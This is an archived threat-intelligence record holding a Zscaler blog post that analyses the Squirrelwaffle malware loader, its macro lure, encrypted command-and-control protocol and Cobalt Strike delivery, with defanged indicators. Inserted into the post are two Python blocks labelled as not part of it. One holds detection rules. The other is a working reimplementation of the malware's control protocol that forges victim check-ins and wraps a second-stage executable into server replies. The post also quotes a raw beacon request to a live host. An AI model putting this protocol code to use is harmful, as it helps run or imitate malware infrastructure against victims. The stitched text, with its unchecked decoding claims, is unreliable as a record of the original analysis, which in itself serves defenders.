{
	"id": "1ceb3573-7aad-4464-affc-31ac8d8757f7",
	"created_at": "2026-04-06T00:08:37.515906Z",
	"updated_at": "2026-04-10T03:24:23.612133Z",
	"deleted_at": null,
	"sha1_hash": "a2d73636602d133dc6f97a92179fcc2ed1fc12b8",
	"title": "The Squirrelwaffle: New Loader Delivers Cobalt Strikes |Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1831476,
	"plain_text": "The Squirrelwaffle: New Loader Delivers Cobalt Strikes |Blog\r\nBy Avinash Kumar, Brett Stone-Gross\r\nPublished: 2021-09-28 · Archived: 2026-04-05 21:50:38 UTC\r\nZscaler ThreatLabz has been following an emerging new malware loader known as Squirrelwaffle that is being used to\r\ndeliver Cobalt Strike. In this blog, we will be analyzing the complete attack chain for this new malware family (as shown in\r\nFigure 1). This campaign has been running since mid-September 2021. The Squirrelwaffle loader is being delivered from the\r\nsame infrastructure that was delivering the Qakbot banking trojan.\r\nAttack Chain\r\nFigure 1: Squirrelwaffle Attack Chain\r\nKey Points\r\nThe campaign started with a malicious document file delivered via spam email campaigns with embedded URLs.\r\nThe spam campaign is using an email thread hijacking technique that was previously used for Emotet and Qakbot\r\nmalware campaigns.\r\nThe malicious document contains a macro that drops and executes a VBS file in the %ProgramData% folder.\r\nThe VBS file downloads the Squirrelwaffle loader which in turn downloads another loader which further downloads\r\nCobalt Strike.\r\nNewly registered domains are used to host the loader payload.\r\nThe same infrastructure was used to deliver the Qakbot banking trojan.\r\nMalware Distribution Strategy\r\nSquirrelwaffle campaigns generally start via spam emails that attempt to convince victims to click an embedded URL using\r\na technique known as email thread hijacking. Email thread hijacking leverages emails that have been stolen prior to the\r\nattack and later repurposed to dupe a victim into believing that an email is from someone that they know who is replying to\r\nthe same thread. Once a victim clicks on the URL, a ZIP file is downloaded that contains a Microsoft Word document. 
These\r\ndocuments follow a similar naming convention matching the regular expression diagram-\\d{2,3}.doc.\r\nFor example, the file with the MD5 hash E599A656599A2680C9392C7329D9D519 has the filename diagram-346.doc.\r\nThis document uses a DocuSign template lure that instructs the user to enable a macro to view the content (as shown in\r\nFigure 2). All the other documents analyzed by Zscaler ThreatLabz have exactly the same content, with multiple modules\r\nthat contain VBA code.\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 1 of 10\n\nFigure 2: Squirrelwaffle Microsoft Word document lure containing a malicious macro\r\nOnce the user enables the macro, an AutoOpen() subroutine is called which then executes a malicious Visual Basic for\r\nApplications (VBA) macro. Here, the AutoOpen() subroutine calls another function, efile(), in the bxh module. There is a\r\nUserForm object in the document which contains a VBS file named pin.vbs that is embedded in the caption of the DocuSign\r\nimage. The macro code leverages cscript.exe to extract the embedded VBS file, which is written\r\nto the %ProgramData% folder and executed using wscript.exe. This VBS file contains an obfuscated PowerShell script with\r\nfive different URLs to download the Squirrelwaffle payload, as shown in Figure 3. The payload is written to %ProgramData%\r\nwith the filename ww1.dll.\r\nFigure 3: Example VBA code that drops a VBS file in the %ProgramData% folder that is used to download Squirrelwaffle\r\nThe VBS file simply uses the IEX (Invoke-Expression) cmdlet to download the Squirrelwaffle loader. 
The payload DLL is\r\nexecuted via rundll32.exe by invoking the export function named ldr.\r\nFigure 4: Example VBS code that downloads and executes the Squirrelwaffle loader.\r\nExample (sanitized) URLs that were used to retrieve Squirrelwaffle are shown below:\r\nhxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html\r\nhxxps://perfectdemos[.]com/Gv1iNAuMKZ/pt.html\r\nhxxps://bussiness-z[.]ml/ze8pCNTIkrIS/pt.html\r\nhxxps://cablingpoint[.]com/ByH5NDoE3kQA/pt.html\r\nhxxps://bonus.corporatebusinessmachines[.]co.in/1Y0qVNce/pt.html\r\nFigure 5 shows the ProgramData folder after the VBS script has executed and the Squirrelwaffle payloads have been\r\ndownloaded.\r\nFigure 5: Disk artifacts after the pin.vbs file has been executed and downloaded the Squirrelwaffle loader DLL.\r\nThe threat actor behind these campaigns has changed some of its TTPs over time. Recently, the initial infection vector has\r\nused hidden Microsoft Excel 4.0 macro sheets with an Auto_Open() macro, which downloads the Squirrelwaffle loader from three\r\ndifferent URLs. The Squirrelwaffle loader is subsequently executed via regsvr32.exe. 
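The delivery chain described above (Word spawning a script host, wscript.exe running a .vbs from %ProgramData%, rundll32.exe invoking the ldr export of a DLL in %ProgramData%, and regsvr32.exe for the Excel variant) maps directly onto process-creation rules. The following is an added example and not code from the Zscaler post: it runs such rules over constructed Sysmon-style events. The event field names, the sample records, the rundll32 parent (powershell.exe) and the regsvr32 parent (EXCEL.EXE) are assumptions; the post names the executables but not their parents.

```python
# Added example (not from the Zscaler post): process-creation rules for the
# Squirrelwaffle delivery chain, run over constructed Sysmon-style events.
# Field names and sample records are assumptions made for this example.
import os

BS = chr(92)                                      # backslash
PROGRAMDATA = 'c:' + BS + 'programdata' + BS      # %ProgramData% on a default install
OFFICE = {'winword.exe', 'excel.exe'}
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}


def win(*parts):
    # Join path components with backslashes without putting them in literals
    return BS.join(parts)


def image_name(path):
    return os.path.basename(path.replace(BS, '/')).lower()


def check_event(ev):
    # ev: {'image': full path, 'parent_image': full path, 'command_line': str}
    image = image_name(ev['image'])
    parent = image_name(ev['parent_image'])
    cmd = ev['command_line'].lower()
    hits = []
    # 1. Word/Excel spawning cscript/wscript: the macro extracting and running pin.vbs
    if parent in OFFICE and image in SCRIPT_HOSTS:
        hits.append('office_spawns_script_host')
    # 2. A script host running a .vbs dropped in %ProgramData%
    if image in SCRIPT_HOSTS and PROGRAMDATA in cmd and '.vbs' in cmd:
        hits.append('script_host_vbs_in_programdata')
    # 3. rundll32 loading a DLL from %ProgramData% through the export ldr (ww1.dll,ldr)
    if image == 'rundll32.exe' and PROGRAMDATA in cmd and ',ldr' in cmd.replace(' ', ''):
        hits.append('rundll32_programdata_ldr_export')
    # 4. regsvr32 started by Office or a script host (Excel 4.0 variant). The parent
    #    process is our assumption; the post only names regsvr32.exe.
    if image == 'regsvr32.exe' and (parent in OFFICE or parent in SCRIPT_HOSTS):
        hits.append('regsvr32_from_office_or_script_host')
    return hits


def triage(events):
    # Return only the events that matched, with the rule names that fired
    out = []
    for ev in events:
        hits = check_event(ev)
        if hits:
            out.append((ev['command_line'], hits))
    return out


SYS32 = win('C:', 'Windows', 'System32')
OFFICE16 = win('C:', 'Program Files', 'Microsoft Office', 'root', 'Office16')

# Constructed events: the first three mimic the chain in the post, the last two are benign
SAMPLE_EVENTS = [
    {'image': win(SYS32, 'wscript.exe'), 'parent_image': win(OFFICE16, 'WINWORD.EXE'),
     'command_line': 'wscript.exe ' + win('C:', 'ProgramData', 'pin.vbs')},
    {'image': win(SYS32, 'rundll32.exe'),
     'parent_image': win(SYS32, 'WindowsPowerShell', 'v1.0', 'powershell.exe'),
     'command_line': 'rundll32.exe ' + win('C:', 'ProgramData', 'ww1.dll') + ',ldr'},
    {'image': win(SYS32, 'regsvr32.exe'), 'parent_image': win(OFFICE16, 'EXCEL.EXE'),
     'command_line': 'regsvr32.exe -s ' + win('C:', 'Users', 'Public', 'diagram.dll')},
    {'image': win(SYS32, 'svchost.exe'), 'parent_image': win(SYS32, 'services.exe'),
     'command_line': 'svchost.exe -k netsvcs'},
    {'image': win(SYS32, 'rundll32.exe'), 'parent_image': win('C:', 'Windows', 'explorer.exe'),
     'command_line': 'rundll32.exe ' + win(SYS32, 'shell32.dll') + ',Control_RunDLL'},
]

if __name__ == '__main__':
    for cmdline, rules in triage(SAMPLE_EVENTS):
        print(cmdline, '->', rules)
```

Rules 1 and 2 fire together on the pin.vbs launch, rule 3 on the ww1.dll,ldr invocation and rule 4 on the regsvr32 launch, while the two benign records (a service host and a rundll32 of shell32.dll from Explorer) produce no hits. Rule 3 deliberately keys on the ProgramData location plus the ldr export rather than on the filename ww1.dll, which the actor can change at no cost.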
An example from this campaign, shown\r\nin Figure 6, used a Microsoft Excel document with the MD5 hash 77BD39191FDC817F2F14F0462BFF8D86 and a\r\nfilename matching the regular expression diagram-\\d{1,9}.xls.\r\nFigure 6: Microsoft Excel document with a malicious macro used to deliver Squirrelwaffle\r\nThe hidden sheet in this Excel document is shown in Figure 7.\r\nFigure 7: Excel 4.0 hidden sheet containing malicious macro code\r\nThe extracted macro code is shown in Figure 8.\r\nFigure 8: Macro code extracted from a hidden Excel sheet\r\nThe threat actor also changed the location where the payload is written to disk. Example (sanitized) URLs that were used to\r\nretrieve Squirrelwaffle from this campaign are shown below:\r\nhxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec.html\r\nhxxps://orquideavallenata[.]com/4jmDb0s9sg/sec.html\r\nhxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec.html\r\nTechnical Analysis of the Payload\r\nThis analysis covers the Squirrelwaffle sample with the MD5 hash 479DAE0F72F4D57BD20E0BF8CB3EBDF7. Once the\r\nSquirrelwaffle payload is downloaded, it is executed via either rundll32.exe or regsvr32.exe, depending on the initial\r\ninfection vector that was used to download the payload. Squirrelwaffle loader samples have recent compilation timestamps and\r\nwere built with Visual Studio 2017, as shown in Figure 9.\r\nFigure 9: Squirrelwaffle compilation metadata\r\nThe Squirrelwaffle loader is a 32-bit DLL which is packed with a custom packer. Similar packers have been observed in\r\nother malware families including Ursnif and Zloader.\r\nSquirrelwaffle contains a hardcoded configuration that is encrypted in the binary. 
There are two main components: a list of\r\nCnC URLs and a list of IP addresses to block, which belong to sandboxes and analysis platforms. These lists are obfuscated\r\nusing an XOR-based algorithm with hardcoded keys. An example formatted Squirrelwaffle configuration is shown in Figure\r\n10.\r\nFigure 10: Formatted Squirrelwaffle configuration after decryption\r\nOnce the malware decodes all of the CnC domains and the IP addresses to block, it creates a socket, sends its data with the\r\nsend() function and receives the CnC response with recv() calls. The CnC communication protocol utilizes an\r\nHTTP POST request with a Base64 encoded payload that is encrypted using an XOR-based algorithm with the hardcoded\r\nkey KJKLO. An example HTTP POST request is shown below:\r\nPOST /dXf4cS4GPL/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkenw= HTTP/1.1\r\nHost: test.dirigu.ro\r\nContent-Length: 76\r\neHp+fHZ7Q0ICAAUPQkUMcRYePyo5ORcrKiQ4LCkTCjo7CC4/KxceIConIiIoQkMHHw0CAhoKRkI=\r\nNote that this request does not contain a User-Agent header; only Host and Content-Length are present. That is consistent\r\nwith the request being assembled by hand over the raw socket described above rather than by a Windows HTTP library, and the\r\nmissing User-Agent is a simple network indicator to look for in proxy logs.\r\nThe path of the HTTP POST request consists of a hardcoded prefix and a Base64 encoded string that is encrypted using the\r\nsame XOR-based algorithm and key as described above. This encoded string includes an alphanumeric string with a random\r\nlength between 1 and 28 characters followed by the IP address of the system. The two fields are delimited by a single tab\r\ncharacter. An example before encryption is shown below:\r\nt2nQfj3SL3XByImciQTqVa\\t192.168.125.11\r\nThe HTTP POST body contains another Base64 encoded string that includes the victim’s computer name, username,\r\napplication data directory, and workgroup. Each field is followed by two tab characters. 
An example payload before\r\nencryption is shown below:\r\nGEORGE-PC\\t\\tgeorge\\t\\tC:\\\\Users\\\\george\\\\AppData\\\\Roaming\\t\\tWORKGROUP\\t\\t\r\nThis payload is encrypted with the same XOR-based algorithm and key as the HTTP POST path component.\r\nThe Squirrelwaffle CnC responds with a Base64 encoded payload that uses the same encryption scheme but a different layout:\r\nfields are separated by two tab characters, which in the observed responses are surrounded by CR and LF bytes. The fields\r\ninclude a status code, a timestamp, the external IP address of the system, and the victim’s system information that was\r\npreviously sent. An example decrypted response is shown below:\r\n200\\r\\n\\t\\t\\n\\r1631911856\\r\\n\\t\\t\\n\\r174.197.7.69\\r\\n\\t\\t\\n\\rGEORGE-PC\\t\\tgeorge\\t\\tC:\\\\Users\\\\george\\\\AppData\\\\Roaming\\t\\tWORKGROUP\\t\\t\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\r\nThe Squirrelwaffle CnC response may also contain a second-stage payload in the seventh field, where the previous example\r\nhas NONE. An example decrypted response is shown below:\r\n200\\r\\n\\t\\t\\n\\r1631913267\\r\\n\\t\\t\\n\\r174.197.7.69\\r\\n\\t\\t\\n\\rGEORGE-PC\\t\\tgeorge\\t\\tC:\\\\Users\\\\george\\\\AppData\\\\Roaming\\t\\tWORKGROUP\\t\\t\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rMZ\\x90\\x00\\x03\\x00\\x00...program cannot be run in DOS mode...\\x00\\x00\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\r\nThis second-stage payload is written to a filename that consists of eleven random alphanumeric characters followed by\r\na .txt extension, and is then executed by Squirrelwaffle.\r\nZscaler ThreatLabz has observed Squirrelwaffle deliver an executable file with the MD5 hash\r\n116301FD453397FDF3CB291341924147. 
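The request and response format described above is small enough to implement end to end. The following is an added example, not code from the Zscaler post or from the malware: it encodes and decodes the path token, the POST body and the response layout, and checks itself against the two Base64 strings quoted from the captured request. Field names, the request builder and the key phase used for the response are assumptions. One detail the post does not state, found by decoding its own sample: the path token only decodes to the documented alphanumeric-TAB-IP layout when the key KJKLO is applied starting at its last character (O), while the POST body decodes with the key starting at its first character (K), so the decoder tries both phases.

```python
# Added example, not code from the Zscaler post or from the malware: an
# encoder/decoder for the Squirrelwaffle CnC format described above.
# Field names, the response key phase and the request builder are assumptions.
import base64
import secrets
import string

KEY = b'KJKLO'                     # XOR key named in the post
TAB = chr(9)
CRLF = chr(13) + chr(10)
RESP_SEP = CRLF + TAB + TAB + chr(10) + chr(13)   # separator seen in the decrypted responses
BODY_FIELDS = ('computer', 'user', 'appdata', 'workgroup')   # our names for the 4 body fields

# Taken from the captured request quoted in the post (Host: test.dirigu.ro)
SAMPLE_PREFIX = 'dXf4cS4GPL/fXMKNg0nKzN'
SAMPLE_PATH = '/' + SAMPLE_PREFIX + '/DA15DggBI0N6dX1le310YXlkenw='
SAMPLE_BODY = 'eHp+fHZ7Q0ICAAUPQkUMcRYePyo5ORcrKiQ4LCkTCjo7CC4/KxceIConIiIoQkMHHw0CAhoKRkI='


def xor_key(data, key=KEY, phase=0):
    # Repeating-key XOR; phase selects the key byte applied to data[0].
    # XOR is its own inverse, so the same call encrypts and decrypts.
    return bytes(b ^ key[(i + phase) % len(key)] for i, b in enumerate(data))


def decode_field(b64, phase=0):
    return xor_key(base64.b64decode(b64), phase=phase).decode('latin-1')


def encode_field(text, phase=0):
    return base64.b64encode(xor_key(text.encode('latin-1'), phase=phase)).decode('ascii')


def looks_like_ip(s):
    parts = s.split('.')
    return len(parts) == 4 and all(p.isdigit() and int(p) < 256 for p in parts)


def decode_path(path, prefix=SAMPLE_PREFIX):
    # Path = '/' + hardcoded prefix + '/' + base64(xor(random_alnum TAB ip)).
    # Observation from decoding the post's sample, not a statement in the post:
    # the path token only decodes when the key is applied starting at its last
    # byte 'O' (phase 4), while the body decodes with the key starting at 'K'
    # (phase 0). Both phases are tried so either variant is handled.
    head = '/' + prefix + '/'
    if not path.startswith(head):
        raise ValueError('unexpected path prefix')
    token = path[len(head):]
    for phase in (0, 4):
        plain = decode_field(token, phase)
        if plain.count(TAB) == 1 and looks_like_ip(plain.split(TAB)[1]):
            rnd, ip = plain.split(TAB)
            return {'random': rnd, 'ip': ip, 'phase': phase}
    raise ValueError('path token does not decode with either key phase')


def decode_body(b64):
    # computer TT user TT appdata TT workgroup TT   (TT = two tab characters)
    return dict(zip(BODY_FIELDS, decode_field(b64).split(TAB + TAB)))


def build_request(host, prefix, ip, computer, user, appdata, workgroup):
    # Reproduces the observed request shape, including the absent User-Agent.
    n = secrets.randbelow(28) + 1                       # 1..28 characters, as in the post
    rnd = ''.join(secrets.choice(string.ascii_letters + string.digits) for _ in range(n))
    path = '/' + prefix + '/' + encode_field(rnd + TAB + ip, phase=4)
    body = encode_field((TAB + TAB).join((computer, user, appdata, workgroup)) + TAB + TAB)
    return ('POST ' + path + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF
            + 'Content-Length: ' + str(len(body)) + CRLF + CRLF + body)


def build_response(status, timestamp, external_ip, sysinfo, payload=b''):
    # Mirrors the decrypted responses quoted above: status, timestamp, external IP,
    # the echoed system info, two NONE slots, then NONE or the second-stage PE.
    # Phase 0 for the response is an assumption; the post shows no response ciphertext.
    slots = [status, timestamp, external_ip, sysinfo, 'NONE', 'NONE',
             payload.decode('latin-1') or 'NONE', '']
    return encode_field(RESP_SEP.join(slots) + CRLF + TAB + TAB + chr(10))


def parse_response(b64):
    # Naive split: a real PE could contain RESP_SEP bytes and the malware's own
    # parser is not described in the post, so treat this as a triage helper.
    slots = decode_field(b64).split(RESP_SEP)
    info = {'status': slots[0], 'timestamp': slots[1], 'external_ip': slots[2],
            'sysinfo': dict(zip(BODY_FIELDS, slots[3].split(TAB + TAB))), 'payload': None}
    if len(slots) > 6 and slots[6].startswith('MZ'):
        info['payload'] = slots[6].encode('latin-1')
    return info


if __name__ == '__main__':
    print(decode_path(SAMPLE_PATH))
    print(decode_body(SAMPLE_BODY))
```

Run against the captured request, the path token decodes to the random string CF3EDNh, a tab and the internal address 192.168.2.10, and the body decodes to a computer name of 305090, a username of NONE, the george AppData path and a workgroup of LSBIHQF, so the quoted ciphertext comes from a different run than the plaintext examples in the text. The phase difference between path and body is an empirical property of the sample; a decoder that assumes a single phase for both silently returns garbage for the path, which is why both are tried.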
This file is packed and is decrypted in memory to produce a Cobalt Strike stager\r\nwith the MD5 hash 38DB72B33ABCEA250F5B7CB5AB514B2C, which in turn downloads the Cobalt Strike beacon.\r\nFigure 11 below shows interesting strings in the Cobalt Strike stager, which impersonates a jQuery request. The EICAR string\r\nis likely an artifact of the threat actor using a demo version of Cobalt Strike.\r\nFigure 11: Cobalt Strike stager delivered by Squirrelwaffle with interesting strings highlighted.\r\nThe Cobalt Strike stager sends an HTTPS GET request to 213.227.154[.]92 with the path /jquery-3.3.1.slim.min.js. The\r\nCobalt Strike CnC server responds with a jQuery file with the encrypted Cobalt Strike beacon embedded as binary data in\r\nthe middle of the file, as shown in Figure 12.\r\nFigure 12: Encrypted Cobalt Strike beacon embedded in jQuery code starting at offset 0xfaf.\r\nThis binary data consists of shellcode that decrypts the Cobalt Strike beacon using the XOR-based algorithm replicated\r\nbelow in Figure 13.\r\nFigure 13: Cobalt Strike beacon decryption algorithm.\r\nThe Cobalt Strike beacon observed by Zscaler ThreatLabz contains the following CnC servers:\r\nhxxps://systemmentorsec[.]com/jquery-3.3.1.min.js\r\nhxxps://213.227.154[.]92/jquery-3.3.1.min.js\r\nCloud Sandbox Detection\r\nFigure 14: Zscaler Cloud Sandbox detection of Squirrelwaffle Loader\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels,\r\nincluding the signature shown below:\r\nWin32.Downloader.Squirrelwaffle\r\nConclusion\r\nAfter the Emotet botnet takedown earlier this year, criminal threat actors are filling that void. Squirrelwaffle appears to be a\r\nnew loader taking advantage of this gap. 
It is not yet clear if Squirrelwaffle is developed and distributed by a known threat\r\nactor or a new group. However, similar distribution techniques were previously used by Emotet. The Zscaler ThreatLabz\r\nteam will continue to monitor this attack, as well as others, to help keep our customers safe.\r\nMITRE ATT\u0026CK TTP Mapping\r\nID Technique\r\nT1059 Command and Scripting Interpreter\r\nT1592 Gather Victim Host Information\r\nT1569 System Services\r\nT1137 Office Application Startup\r\nT1055 Process Injection\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1436 Commonly Used Port\r\nT1437 Standard Application Layer Protocol\r\nT1106 Native API\r\nIndicators of Compromise\r\nSquirrelwaffle ZIP archive URLs\r\nhxxp://amaimaging[.]com/voluptas-quidem/documents.zip\r\nhxxp://beautifulgist[.]com/id-alias/documents.zip\r\nhxxp://bussiness-z[.]ml/qui-quia/documents.zip\r\nhxxp://gadhwadasamaj.techofi[.]in/expedita-consequatur/documents.zip\r\nhxxp://inetworx.co[.]za/voluptate-sunt/documents.zip\r\nhxxp://insurance.akademiilmujaya[.]com/beatae-sunt/documents.zip\r\nhxxp://prevenzioneformazionelavoro[.]it/quasi-reprehenderit/documents.zip\r\nhxxp://procatodicadelacosta[.]com/neque-et/documents.zip\r\nhxxp://readgasm[.]com/repudiandae-provident/documents.zip\r\nhxxp://rinconadadellago[.]com.mx/qui-quia/documents.zip\r\nhxxp://saraviatowing[.]net/et-praesentium/documents.zip\r\nhxxp://shahanaschool[.]in/illum-accusamus/documents.zip\r\nhxxp://srv7.corpwebcontrol[.]com/np/prog_est.zip\r\nhxxp://srv7.corpwebcontrol[.]com/np/user_est.zip\r\nhxxp://stripemovired.ramfactoryarg[.]com/nostrum-ab/documents.zip\r\nhxxp://syncun[.]com/natus-aut/documents.zip\r\nhxxp://tradingview-brokers.skoconstructionng[.]com/molestiae-voluptatum/documents.zip\r\nhxxps://abogados-en-medellin[.]com/odit-error/documents.zip\r\nhxxps://amaimaging[.]com/voluptas-quidem/ducimus.zip\r\nhxxps://builtbvbh-com[.]gq/eum-est/voluptas.zip\r\nhxxps://builtbybh-com[.]gq/eum-est/voluptas.zip\r\nhxxps://builtybybh-com[.]gq/eum-est/voluptas.zip\r\nhxxps://cctvfiles[.]xyz/aliquam-ipsam/documents.zip\r\nhxxps://focus.focalrack[.]com/enim-rerum/ducimus.zip\r\nhxxps://inetworx.co[.]za/voluptate-sunt/est.zip\r\nhxxps://kmslogistik[.]com/repellat-et/est.zip\r\nhxxps://moeinjelveh[.]ir/et-eligendi/placeat.zip\r\nhxxps://readgasm[.]com/repudiandae-provident/voluptas.zip\r\nhxxps://saraviatowing[.]net/et-praesentium/placeat.zip\r\nhxxps://sextoystore.co[.]in/temporibus-aut/est.zip\r\nhxxps://shivrajengineering[.]in/qui-dolores/placeat.zip\r\nSquirrelwaffle Loader URLs\r\nhxxps://ghapan[.]com/Kdg73onC3oQ/090921.html\r\nhxxps://yoowi[.]net/tDzEJ8uVGwdj/130921.html\r\nhxxps://gruasingenieria[.]pe/LUS1NTVui6/090921.html\r\nhxxps://chaturanga.groopy[.]com/7SEZBnhMLW/130921.html\r\nhxxps://lotolands[.]com/JtaTAt4Ej/130921.html\r\nhxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec.html\r\nhxxps://orquideavallenata[.]com/4jmDb0s9sg/sec.html\r\nhxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec.html\r\nSquirrelwaffle Word Document File MD5 
Hashes\r\n326498ae163f0d6b8a863d24793f152d\r\n2156a1a8b0c579a51ea77d1bc7062b49\r\n5e9f33e5baa6d6efca91c8db78c01bd0\r\nfae4ca3c95a5068063637b2f2ed3a5b2\r\na449e5044437c453fce2ead881aa8161\r\nc27545fbb3b4ff35277bce1383655e46\r\nc774e400b46f4c0bb90c11e349bc36a0\r\nc2ed8fc614aeda36a7e3a638fa7db16a\r\ndb11964b27738bf4e3a1501e11bd54ad\r\n822e20c95df7165009600a9bfbff9b5e\r\nc1ed800a4ae9d4efd61de3aa7fd657b4\r\nb478bc389fc15e17b231984fa80e2b0d\r\ne599a656599a2680c9392c7329d9d519\r\nda48063b7d75ec645f4370b95c28675c\r\nc3bd4145feaaae541cb17ccc7cbd2e44\r\n558f97103085394c3a35c9b03839fe72\r\na07f5b21376cd2b661f36dcdc2081b75\r\n5b50f7beabcff32bd02de2dda2766a7b\r\nSquirrelwaffle VBS File MD5 Hash\r\n9da69f65ce4e8e57aef3ea1dd96f42ec\r\nSquirrelwaffle Loader MD5 Hashes\r\n7e9ba57db08f53b56715b0a8121bd839\r\n5ec89ea30af2cc38ae183d12ffacbcf7\r\na3ecc9951178447b546b004ea2dfd93f\r\n9545905ea3735dcac289eead39e3f893\r\n732ce2ef4b18042ef9e3f3e52ad59916\r\ncb905bb6a38b5d253eb64aab46eafbd7\r\nebeeef845d0d666363935da89a57b44d\r\nUnpacked DLL file MD5 Hash\r\n3ecc9ca5e744d7ddafa04834c70b95c3\r\nIP addresses and domains used by the DLL for Squirrelwaffle CnC\r\n107[.]180[.]12[.]15 port 80 centralfloridaasphalt[.]com\r\n119[.]235[.]250[.]50 port 80 kmslogistik[.]com\r\n143[.]95[.]80[.]83 port 80 chaturanga[.]groopy[.]com\r\n160[.]153[.]129[.]37 port 80 mercyfoundationcio[.]org\r\n160[.]153[.]129[.]37 port 80 shoeclearanceoutlet[.]co[.]uk\r\n160[.]153[.]131[.]187 port 80 spiritofprespa[.]com\r\n166[.]62[.]28[.]139 port 80 jhehosting[.]com\r\n166[.]62[.]28[.]139 port 80 key4net[.]com\r\n166[.]62[.]28[.]139 port 80 lead[.]jhinfotech[.]co\r\n166[.]62[.]28[.]139 port 80 voip[.]voipcallhub[.]com\r\n166[.]62[.]28[.]139 port 80 voipcallhub[.]com\r\n194[.]181[.]228[.]45 port 80 bartek-lenart[.]pl\r\n194[.]181[.]228[.]45 port 80 lenartsa[.]webd[.]pro\r\n202[.]52[.]147[.]113 port 80 
amjsys[.]com\r\n203[.]124[.]44[.]95 port 80 novamarketing[.]com[.]pk\r\n216[.]219[.]81[.]3 port 80 ems[.]prodigygroupindia[.]com\r\n216[.]219[.]81[.]3 port 80 hrms[.]prodigygroupindia[.]com\r\nCobalt Strike Stager MD5 Hashes\r\n116301fd453397fdf3cb291341924147\r\nef799b5261fd69b56c8b70a3d22d5120\r\nCobalt Strike CnC Servers\r\n213.227.154[.]92:443/jquery-3.3.1.min.js\r\n213.227.154[.]92:8080/jquery-3.3.1.min.js\r\nsystemmentorsec[.]com:443/jquery-3.3.1.min.js\r\nsystemmentorsec[.]com:8080/jquery-3.3.1.min.js\r\nSource: https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike"
	],
	"report_names": [
		"squirrelwaffle-new-loader-delivering-cobalt-strike"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434117,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a2d73636602d133dc6f97a92179fcc2ed1fc12b8.pdf",
		"text": "https://archive.orkl.eu/a2d73636602d133dc6f97a92179fcc2ed1fc12b8.txt",
		"img": "https://archive.orkl.eu/a2d73636602d133dc6f97a92179fcc2ed1fc12b8.jpg"
	}
}